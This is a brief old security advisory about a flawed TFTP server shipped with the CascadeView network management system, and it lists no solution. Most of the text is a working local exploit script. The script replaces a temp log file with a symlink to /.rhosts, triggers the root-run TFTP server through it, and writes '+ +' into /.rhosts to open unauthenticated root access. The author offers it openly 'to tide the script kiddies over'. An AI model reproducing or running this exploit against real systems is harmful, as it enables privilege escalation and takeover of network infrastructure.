COMMAND

    CascadeView (tftp)

SYSTEMS AFFECTED

    CascadeView

PROBLEM

    Loneguard found following.   CascadeView is an network  management
    system  that  ships  with  an  exploitable  TFTP  server.  In case
    anyone misses the  significance of this,  you control the  NMS you
    control the network.   Here's a local  exploit to tied  the script
    kiddies over...

    #!/bin/sh
    #
    # tftpserv.sh - Loneguard 07/03/99
    #
    # Buggy tftp server shipped with CascadeView B-STDX 8000/9000
    #
    rm /tmp/tftpd_xfer_status.log
    ln -s /.rhosts /tmp/tftpd_xfer_status.log
    echo KungFu > crazymonkey
    ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
    echo "+ +" > /.rhosts

SOLUTION

    Nothing yet.